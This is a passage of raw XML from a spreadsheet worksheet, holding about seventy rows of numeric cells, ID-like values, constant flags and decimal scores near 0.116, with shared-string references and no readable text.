        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="17686" ht="15.75" customHeight="1">
      <c r="A17686" s="1">
        <v>26912.0</v>
      </c>
      <c r="B17686" s="2">
        <v>1.9347707E7</v>
      </c>
      <c r="C17686" s="2" t="s">
        <v>17052</v>
      </c>
      <c r="D17686" s="2">
        <v>1.0</v>
      </c>
      <c r="E17686" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17686" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="17687" ht="15.75" customHeight="1">
      <c r="A17687" s="1">
        <v>27597.0</v>
      </c>
      <c r="B17687" s="2">
        <v>2.2572097E7</v>
      </c>
      <c r="C17687" s="2" t="s">
        <v>17053</v>
      </c>
      <c r="D17687" s="2">
        <v>1.0</v>
      </c>
      <c r="E17687" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17687" s="2">
        <v>0.1170940170940171</v>
      </c>
    </row>
    <row r="17688" ht="15.75" customHeight="1">
      <c r="A17688" s="1">
        <v>27705.0</v>
      </c>
      <c r="B17688" s="2">
        <v>2.3040243E7</v>
      </c>
      <c r="C17688" s="2" t="s">
        <v>17054</v>
      </c>
      <c r="D17688" s="2">
        <v>1.0</v>
      </c>
      <c r="E17688" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17688" s="2">
        <v>0.117003367003367</v>
      </c>
    </row>
    <row r="17689" ht="15.75" customHeight="1">
      <c r="A17689" s="1">
        <v>24489.0</v>
      </c>
      <c r="B17689" s="2">
        <v>1.1068629E7</v>
      </c>
      <c r="C17689" s="2" t="s">
        <v>17055</v>
      </c>
      <c r="D17689" s="2">
        <v>1.0</v>
      </c>
      <c r="E17689" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17689" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="17690" ht="15.75" customHeight="1">
      <c r="A17690" s="1">
        <v>24894.0</v>
      </c>
      <c r="B17690" s="2">
        <v>1.2271924E7</v>
      </c>
      <c r="C17690" s="2" t="s">
        <v>17056</v>
      </c>
      <c r="D17690" s="2">
        <v>1.0</v>
      </c>
      <c r="E17690" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17690" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="17691" ht="15.75" customHeight="1">
      <c r="A17691" s="1">
        <v>2669.0</v>
      </c>
      <c r="B17691" s="2">
        <v>3.4735453E7</v>
      </c>
      <c r="C17691" s="2" t="s">
        <v>17057</v>
      </c>
      <c r="D17691" s="2">
        <v>1.0</v>
      </c>
      <c r="E17691" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17691" s="2">
        <v>0.1164383561643836</v>
      </c>
    </row>
    <row r="17692" ht="15.75" customHeight="1">
      <c r="A17692" s="1">
        <v>2488.0</v>
      </c>
      <c r="B17692" s="2">
        <v>3.3882208E7</v>
      </c>
      <c r="C17692" s="2" t="s">
        <v>17058</v>
      </c>
      <c r="D17692" s="2">
        <v>1.0</v>
      </c>
      <c r="E17692" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17692" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17693" ht="15.75" customHeight="1">
      <c r="A17693" s="1">
        <v>4048.0</v>
      </c>
      <c r="B17693" s="2">
        <v>4.1074161E7</v>
      </c>
      <c r="C17693" s="2" t="s">
        <v>17059</v>
      </c>
      <c r="D17693" s="2">
        <v>1.0</v>
      </c>
      <c r="E17693" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17693" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17694" ht="15.75" customHeight="1">
      <c r="A17694" s="1">
        <v>7327.0</v>
      </c>
      <c r="B17694" s="2">
        <v>5.0901308E7</v>
      </c>
      <c r="C17694" s="2" t="s">
        <v>17060</v>
      </c>
      <c r="D17694" s="2">
        <v>1.0</v>
      </c>
      <c r="E17694" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17694" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17695" ht="15.75" customHeight="1">
      <c r="A17695" s="1">
        <v>7397.0</v>
      </c>
      <c r="B17695" s="2">
        <v>5.1100805E7</v>
      </c>
      <c r="C17695" s="2" t="s">
        <v>17061</v>
      </c>
      <c r="D17695" s="2">
        <v>1.0</v>
      </c>
      <c r="E17695" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17695" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17696" ht="15.75" customHeight="1">
      <c r="A17696" s="1">
        <v>8255.0</v>
      </c>
      <c r="B17696" s="2">
        <v>5.3381741E7</v>
      </c>
      <c r="C17696" s="2" t="s">
        <v>17062</v>
      </c>
      <c r="D17696" s="2">
        <v>1.0</v>
      </c>
      <c r="E17696" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17696" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17697" ht="15.75" customHeight="1">
      <c r="A17697" s="1">
        <v>10440.0</v>
      </c>
      <c r="B17697" s="2">
        <v>1.0441087E7</v>
      </c>
      <c r="C17697" s="2" t="s">
        <v>17063</v>
      </c>
      <c r="D17697" s="2">
        <v>1.0</v>
      </c>
      <c r="E17697" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17697" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17698" ht="15.75" customHeight="1">
      <c r="A17698" s="1">
        <v>10477.0</v>
      </c>
      <c r="B17698" s="2">
        <v>1.0871077E7</v>
      </c>
      <c r="C17698" s="2" t="s">
        <v>17064</v>
      </c>
      <c r="D17698" s="2">
        <v>1.0</v>
      </c>
      <c r="E17698" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17698" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17699" ht="15.75" customHeight="1">
      <c r="A17699" s="1">
        <v>10645.0</v>
      </c>
      <c r="B17699" s="2">
        <v>1.4148418E7</v>
      </c>
      <c r="C17699" s="2" t="s">
        <v>17065</v>
      </c>
      <c r="D17699" s="2">
        <v>1.0</v>
      </c>
      <c r="E17699" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17699" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17700" ht="15.75" customHeight="1">
      <c r="A17700" s="1">
        <v>11737.0</v>
      </c>
      <c r="B17700" s="2">
        <v>2.405194E7</v>
      </c>
      <c r="C17700" s="2" t="s">
        <v>17066</v>
      </c>
      <c r="D17700" s="2">
        <v>1.0</v>
      </c>
      <c r="E17700" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17700" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17701" ht="15.75" customHeight="1">
      <c r="A17701" s="1">
        <v>11988.0</v>
      </c>
      <c r="B17701" s="2">
        <v>2.5853405E7</v>
      </c>
      <c r="C17701" s="2" t="s">
        <v>17067</v>
      </c>
      <c r="D17701" s="2">
        <v>1.0</v>
      </c>
      <c r="E17701" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17701" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17702" ht="15.75" customHeight="1">
      <c r="A17702" s="1">
        <v>11994.0</v>
      </c>
      <c r="B17702" s="2">
        <v>2.5912454E7</v>
      </c>
      <c r="C17702" s="2" t="s">
        <v>17068</v>
      </c>
      <c r="D17702" s="2">
        <v>1.0</v>
      </c>
      <c r="E17702" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17702" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17703" ht="15.75" customHeight="1">
      <c r="A17703" s="1">
        <v>12102.0</v>
      </c>
      <c r="B17703" s="2">
        <v>2.6768842E7</v>
      </c>
      <c r="C17703" s="2" t="s">
        <v>17069</v>
      </c>
      <c r="D17703" s="2">
        <v>1.0</v>
      </c>
      <c r="E17703" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17703" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17704" ht="15.75" customHeight="1">
      <c r="A17704" s="1">
        <v>12656.0</v>
      </c>
      <c r="B17704" s="2">
        <v>3.0443323E7</v>
      </c>
      <c r="C17704" s="2" t="s">
        <v>17070</v>
      </c>
      <c r="D17704" s="2">
        <v>1.0</v>
      </c>
      <c r="E17704" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17704" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17705" ht="15.75" customHeight="1">
      <c r="A17705" s="1">
        <v>13329.0</v>
      </c>
      <c r="B17705" s="2">
        <v>3.4631426E7</v>
      </c>
      <c r="C17705" s="2" t="s">
        <v>17071</v>
      </c>
      <c r="D17705" s="2">
        <v>1.0</v>
      </c>
      <c r="E17705" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17705" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17706" ht="15.75" customHeight="1">
      <c r="A17706" s="1">
        <v>13522.0</v>
      </c>
      <c r="B17706" s="2">
        <v>3.5513086E7</v>
      </c>
      <c r="C17706" s="2" t="s">
        <v>17072</v>
      </c>
      <c r="D17706" s="2">
        <v>1.0</v>
      </c>
      <c r="E17706" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17706" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17707" ht="15.75" customHeight="1">
      <c r="A17707" s="1">
        <v>13922.0</v>
      </c>
      <c r="B17707" s="2">
        <v>3.7099265E7</v>
      </c>
      <c r="C17707" s="2" t="s">
        <v>17073</v>
      </c>
      <c r="D17707" s="2">
        <v>1.0</v>
      </c>
      <c r="E17707" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17707" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17708" ht="15.75" customHeight="1">
      <c r="A17708" s="1">
        <v>14179.0</v>
      </c>
      <c r="B17708" s="2">
        <v>3.8093762E7</v>
      </c>
      <c r="C17708" s="2" t="s">
        <v>17074</v>
      </c>
      <c r="D17708" s="2">
        <v>1.0</v>
      </c>
      <c r="E17708" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17708" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17709" ht="15.75" customHeight="1">
      <c r="A17709" s="1">
        <v>14381.0</v>
      </c>
      <c r="B17709" s="2">
        <v>3.9009218E7</v>
      </c>
      <c r="C17709" s="2" t="s">
        <v>17075</v>
      </c>
      <c r="D17709" s="2">
        <v>1.0</v>
      </c>
      <c r="E17709" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17709" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17710" ht="15.75" customHeight="1">
      <c r="A17710" s="1">
        <v>16200.0</v>
      </c>
      <c r="B17710" s="2">
        <v>4.5665186E7</v>
      </c>
      <c r="C17710" s="2" t="s">
        <v>17076</v>
      </c>
      <c r="D17710" s="2">
        <v>1.0</v>
      </c>
      <c r="E17710" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17710" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17711" ht="15.75" customHeight="1">
      <c r="A17711" s="1">
        <v>16547.0</v>
      </c>
      <c r="B17711" s="2">
        <v>4.6803127E7</v>
      </c>
      <c r="C17711" s="2" t="s">
        <v>17077</v>
      </c>
      <c r="D17711" s="2">
        <v>1.0</v>
      </c>
      <c r="E17711" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17711" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17712" ht="15.75" customHeight="1">
      <c r="A17712" s="1">
        <v>17078.0</v>
      </c>
      <c r="B17712" s="2">
        <v>4.8613207E7</v>
      </c>
      <c r="C17712" s="2" t="s">
        <v>17078</v>
      </c>
      <c r="D17712" s="2">
        <v>1.0</v>
      </c>
      <c r="E17712" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17712" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17713" ht="15.75" customHeight="1">
      <c r="A17713" s="1">
        <v>17383.0</v>
      </c>
      <c r="B17713" s="2">
        <v>4.9571342E7</v>
      </c>
      <c r="C17713" s="2" t="s">
        <v>17079</v>
      </c>
      <c r="D17713" s="2">
        <v>1.0</v>
      </c>
      <c r="E17713" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17713" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17714" ht="15.75" customHeight="1">
      <c r="A17714" s="1">
        <v>17511.0</v>
      </c>
      <c r="B17714" s="2">
        <v>5.0014243E7</v>
      </c>
      <c r="C17714" s="2" t="s">
        <v>17080</v>
      </c>
      <c r="D17714" s="2">
        <v>1.0</v>
      </c>
      <c r="E17714" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17714" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17715" ht="15.75" customHeight="1">
      <c r="A17715" s="1">
        <v>17955.0</v>
      </c>
      <c r="B17715" s="2">
        <v>5.1286977E7</v>
      </c>
      <c r="C17715" s="2" t="s">
        <v>17081</v>
      </c>
      <c r="D17715" s="2">
        <v>1.0</v>
      </c>
      <c r="E17715" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17715" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17716" ht="15.75" customHeight="1">
      <c r="A17716" s="1">
        <v>17959.0</v>
      </c>
      <c r="B17716" s="2">
        <v>5.1296488E7</v>
      </c>
      <c r="C17716" s="2" t="s">
        <v>17082</v>
      </c>
      <c r="D17716" s="2">
        <v>1.0</v>
      </c>
      <c r="E17716" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17716" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17717" ht="15.75" customHeight="1">
      <c r="A17717" s="1">
        <v>18009.0</v>
      </c>
      <c r="B17717" s="2">
        <v>5.1474673E7</v>
      </c>
      <c r="C17717" s="2" t="s">
        <v>17083</v>
      </c>
      <c r="D17717" s="2">
        <v>1.0</v>
      </c>
      <c r="E17717" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17717" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17718" ht="15.75" customHeight="1">
      <c r="A17718" s="1">
        <v>18112.0</v>
      </c>
      <c r="B17718" s="2">
        <v>5.1747047E7</v>
      </c>
      <c r="C17718" s="2" t="s">
        <v>17084</v>
      </c>
      <c r="D17718" s="2">
        <v>1.0</v>
      </c>
      <c r="E17718" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17718" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17719" ht="15.75" customHeight="1">
      <c r="A17719" s="1">
        <v>19156.0</v>
      </c>
      <c r="B17719" s="2">
        <v>5.4894352E7</v>
      </c>
      <c r="C17719" s="2" t="s">
        <v>17085</v>
      </c>
      <c r="D17719" s="2">
        <v>1.0</v>
      </c>
      <c r="E17719" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17719" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17720" ht="15.75" customHeight="1">
      <c r="A17720" s="1">
        <v>19482.0</v>
      </c>
      <c r="B17720" s="2">
        <v>5.5854104E7</v>
      </c>
      <c r="C17720" s="2" t="s">
        <v>17086</v>
      </c>
      <c r="D17720" s="2">
        <v>1.0</v>
      </c>
      <c r="E17720" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17720" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17721" ht="15.75" customHeight="1">
      <c r="A17721" s="1">
        <v>20985.0</v>
      </c>
      <c r="B17721" s="2">
        <v>1.7000247E7</v>
      </c>
      <c r="C17721" s="2" t="s">
        <v>17087</v>
      </c>
      <c r="D17721" s="2">
        <v>1.0</v>
      </c>
      <c r="E17721" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17721" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17722" ht="15.75" customHeight="1">
      <c r="A17722" s="1">
        <v>21852.0</v>
      </c>
      <c r="B17722" s="2">
        <v>2.7173801E7</v>
      </c>
      <c r="C17722" s="2" t="s">
        <v>17088</v>
      </c>
      <c r="D17722" s="2">
        <v>1.0</v>
      </c>
      <c r="E17722" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17722" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17723" ht="15.75" customHeight="1">
      <c r="A17723" s="1">
        <v>22333.0</v>
      </c>
      <c r="B17723" s="2">
        <v>3.4284855E7</v>
      </c>
      <c r="C17723" s="2" t="s">
        <v>17089</v>
      </c>
      <c r="D17723" s="2">
        <v>1.0</v>
      </c>
      <c r="E17723" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17723" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17724" ht="15.75" customHeight="1">
      <c r="A17724" s="1">
        <v>22877.0</v>
      </c>
      <c r="B17724" s="2">
        <v>4.7602008E7</v>
      </c>
      <c r="C17724" s="2" t="s">
        <v>17090</v>
      </c>
      <c r="D17724" s="2">
        <v>1.0</v>
      </c>
      <c r="E17724" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17724" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17725" ht="15.75" customHeight="1">
      <c r="A17725" s="1">
        <v>23503.0</v>
      </c>
      <c r="B17725" s="2">
        <v>5780328.0</v>
      </c>
      <c r="C17725" s="2" t="s">
        <v>17091</v>
      </c>
      <c r="D17725" s="2">
        <v>1.0</v>
      </c>
      <c r="E17725" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17725" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17726" ht="15.75" customHeight="1">
      <c r="A17726" s="1">
        <v>23848.0</v>
      </c>
      <c r="B17726" s="2">
        <v>8195525.0</v>
      </c>
      <c r="C17726" s="2" t="s">
        <v>17092</v>
      </c>
      <c r="D17726" s="2">
        <v>1.0</v>
      </c>
      <c r="E17726" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17726" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17727" ht="15.75" customHeight="1">
      <c r="A17727" s="1">
        <v>24019.0</v>
      </c>
      <c r="B17727" s="2">
        <v>9341243.0</v>
      </c>
      <c r="C17727" s="2" t="s">
        <v>17093</v>
      </c>
      <c r="D17727" s="2">
        <v>1.0</v>
      </c>
      <c r="E17727" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17727" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17728" ht="15.75" customHeight="1">
      <c r="A17728" s="1">
        <v>24056.0</v>
      </c>
      <c r="B17728" s="2">
        <v>9575627.0</v>
      </c>
      <c r="C17728" s="2" t="s">
        <v>17094</v>
      </c>
      <c r="D17728" s="2">
        <v>1.0</v>
      </c>
      <c r="E17728" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17728" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17729" ht="15.75" customHeight="1">
      <c r="A17729" s="1">
        <v>24062.0</v>
      </c>
      <c r="B17729" s="2">
        <v>9610079.0</v>
      </c>
      <c r="C17729" s="2" t="s">
        <v>17095</v>
      </c>
      <c r="D17729" s="2">
        <v>1.0</v>
      </c>
      <c r="E17729" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17729" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17730" ht="15.75" customHeight="1">
      <c r="A17730" s="1">
        <v>24388.0</v>
      </c>
      <c r="B17730" s="2">
        <v>1.0783157E7</v>
      </c>
      <c r="C17730" s="2" t="s">
        <v>17096</v>
      </c>
      <c r="D17730" s="2">
        <v>1.0</v>
      </c>
      <c r="E17730" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17730" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17731" ht="15.75" customHeight="1">
      <c r="A17731" s="1">
        <v>24391.0</v>
      </c>
      <c r="B17731" s="2">
        <v>1.0783157E7</v>
      </c>
      <c r="C17731" s="2" t="s">
        <v>17097</v>
      </c>
      <c r="D17731" s="2">
        <v>1.0</v>
      </c>
      <c r="E17731" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17731" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17732" ht="15.75" customHeight="1">
      <c r="A17732" s="1">
        <v>24496.0</v>
      </c>
      <c r="B17732" s="2">
        <v>1.1090924E7</v>
      </c>
      <c r="C17732" s="2" t="s">
        <v>17098</v>
      </c>
      <c r="D17732" s="2">
        <v>1.0</v>
      </c>
      <c r="E17732" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17732" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17733" ht="15.75" customHeight="1">
      <c r="A17733" s="1">
        <v>24537.0</v>
      </c>
      <c r="B17733" s="2">
        <v>1.1213053E7</v>
      </c>
      <c r="C17733" s="2" t="s">
        <v>17099</v>
      </c>
      <c r="D17733" s="2">
        <v>1.0</v>
      </c>
      <c r="E17733" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17733" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17734" ht="15.75" customHeight="1">
      <c r="A17734" s="1">
        <v>24852.0</v>
      </c>
      <c r="B17734" s="2">
        <v>1.2200204E7</v>
      </c>
      <c r="C17734" s="2" t="s">
        <v>17100</v>
      </c>
      <c r="D17734" s="2">
        <v>1.0</v>
      </c>
      <c r="E17734" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17734" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17735" ht="15.75" customHeight="1">
      <c r="A17735" s="1">
        <v>24930.0</v>
      </c>
      <c r="B17735" s="2">
        <v>1.24394E7</v>
      </c>
      <c r="C17735" s="2" t="s">
        <v>17101</v>
      </c>
      <c r="D17735" s="2">
        <v>1.0</v>
      </c>
      <c r="E17735" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17735" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17736" ht="15.75" customHeight="1">
      <c r="A17736" s="1">
        <v>25080.0</v>
      </c>
      <c r="B17736" s="2">
        <v>1.28818E7</v>
      </c>
      <c r="C17736" s="2" t="s">
        <v>17102</v>
      </c>
      <c r="D17736" s="2">
        <v>1.0</v>
      </c>
      <c r="E17736" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17736" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17737" ht="15.75" customHeight="1">
      <c r="A17737" s="1">
        <v>25557.0</v>
      </c>
      <c r="B17737" s="2">
        <v>1.4280844E7</v>
      </c>
      <c r="C17737" s="2" t="s">
        <v>17103</v>
      </c>
      <c r="D17737" s="2">
        <v>1.0</v>
      </c>
      <c r="E17737" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17737" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17738" ht="15.75" customHeight="1">
      <c r="A17738" s="1">
        <v>25732.0</v>
      </c>
      <c r="B17738" s="2">
        <v>1.4564072E7</v>
      </c>
      <c r="C17738" s="2" t="s">
        <v>17104</v>
      </c>
      <c r="D17738" s="2">
        <v>1.0</v>
      </c>
      <c r="E17738" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17738" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17739" ht="15.75" customHeight="1">
      <c r="A17739" s="1">
        <v>25763.0</v>
      </c>
      <c r="B17739" s="2">
        <v>1.4625175E7</v>
      </c>
      <c r="C17739" s="2" t="s">
        <v>17105</v>
      </c>
      <c r="D17739" s="2">
        <v>1.0</v>
      </c>
      <c r="E17739" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17739" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17740" ht="15.75" customHeight="1">
      <c r="A17740" s="1">
        <v>26531.0</v>
      </c>
      <c r="B17740" s="2">
        <v>1.7705013E7</v>
      </c>
      <c r="C17740" s="2" t="s">
        <v>17106</v>
      </c>
      <c r="D17740" s="2">
        <v>1.0</v>
      </c>
      <c r="E17740" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17740" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17741" ht="15.75" customHeight="1">
      <c r="A17741" s="1">
        <v>27801.0</v>
      </c>
      <c r="B17741" s="2">
        <v>2.319553E7</v>
      </c>
      <c r="C17741" s="2" t="s">
        <v>17107</v>
      </c>
      <c r="D17741" s="2">
        <v>1.0</v>
      </c>
      <c r="E17741" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17741" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17742" ht="15.75" customHeight="1">
      <c r="A17742" s="1">
        <v>28129.0</v>
      </c>
      <c r="B17742" s="2">
        <v>2.4724821E7</v>
      </c>
      <c r="C17742" s="2" t="s">
        <v>17108</v>
      </c>
      <c r="D17742" s="2">
        <v>1.0</v>
      </c>
      <c r="E17742" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17742" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17743" ht="15.75" customHeight="1">
      <c r="A17743" s="1">
        <v>28586.0</v>
      </c>
      <c r="B17743" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C17743" s="2" t="s">
        <v>17109</v>
      </c>
      <c r="D17743" s="2">
        <v>1.0</v>
      </c>
      <c r="E17743" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17743" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17744" ht="15.75" customHeight="1">
      <c r="A17744" s="1">
        <v>29410.0</v>
      </c>
      <c r="B17744" s="2">
        <v>3.2081987E7</v>
      </c>
      <c r="C17744" s="2" t="s">
        <v>17110</v>
      </c>
      <c r="D17744" s="2">
        <v>1.0</v>
      </c>
      <c r="E17744" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17744" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17745" ht="15.75" customHeight="1">
      <c r="A17745" s="1">
        <v>29696.0</v>
      </c>
      <c r="B17745" s="2">
        <v>3.4284854E7</v>
      </c>
      <c r="C17745" s="2" t="s">
        <v>17111</v>
      </c>
      <c r="D17745" s="2">
        <v>1.0</v>
      </c>
      <c r="E17745" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17745" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17746" ht="15.75" customHeight="1">
      <c r="A17746" s="1">
        <v>29888.0</v>
      </c>
      <c r="B17746" s="2">
        <v>3607013.0</v>
      </c>
      <c r="C17746" s="2" t="s">
        <v>17112</v>
      </c>
      <c r="D17746" s="2">
        <v>1.0</v>
      </c>
      <c r="E17746" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17746" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17747" ht="15.75" customHeight="1">
      <c r="A17747" s="1">
        <v>30114.0</v>
      </c>
      <c r="B17747" s="2">
        <v>3679363.0</v>
      </c>
      <c r="C17747" s="2" t="s">
        <v>17113</v>
      </c>
      <c r="D17747" s="2">
        <v>1.0</v>
      </c>
      <c r="E17747" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17747" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17748" ht="15.75" customHeight="1">
      <c r="A17748" s="1">
        <v>31366.0</v>
      </c>
      <c r="B17748" s="2">
        <v>4.9939772E7</v>
      </c>
      <c r="C17748" s="2" t="s">
        <v>17114</v>
      </c>
      <c r="D17748" s="2">
        <v>1.0</v>
      </c>
      <c r="E17748" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17748" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17749" ht="15.75" customHeight="1">
      <c r="A17749" s="1">
        <v>31613.0</v>
      </c>
      <c r="B17749" s="2">
        <v>5143743.0</v>
      </c>
      <c r="C17749" s="2" t="s">
        <v>17115</v>
      </c>
      <c r="D17749" s="2">
        <v>1.0</v>
      </c>
      <c r="E17749" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17749" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17750" ht="15.75" customHeight="1">
      <c r="A17750" s="1">
        <v>32452.0</v>
      </c>
      <c r="B17750" s="2">
        <v>5671041.0</v>
      </c>
      <c r="C17750" s="2" t="s">
        <v>17116</v>
      </c>
      <c r="D17750" s="2">
        <v>1.0</v>
      </c>
      <c r="E17750" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17750" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17751" ht="15.75" customHeight="1">
      <c r="A17751" s="1">
        <v>32527.0</v>
      </c>
      <c r="B17751" s="2">
        <v>5731183.0</v>
      </c>
      <c r="C17751" s="2" t="s">
        <v>17117</v>
      </c>
      <c r="D17751" s="2">
        <v>1.0</v>
      </c>
      <c r="E17751" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17751" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="17752" ht="15.75" customHeight="1">
      <c r="A17752" s="1">
        <v>32621.0</v>
      </c>
      <c r="B17752" s="2">
        <v>5840027.0</v>
      </c>
      <c r="C17752" s="2" t="s">
        <v>17118</v>
      </c>
      <c r="D17752" s="2">
        <v>1.0</v>
      </c>
      <c r="E17752" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17752" s="2">
        <v>0.1163522012578616</v>
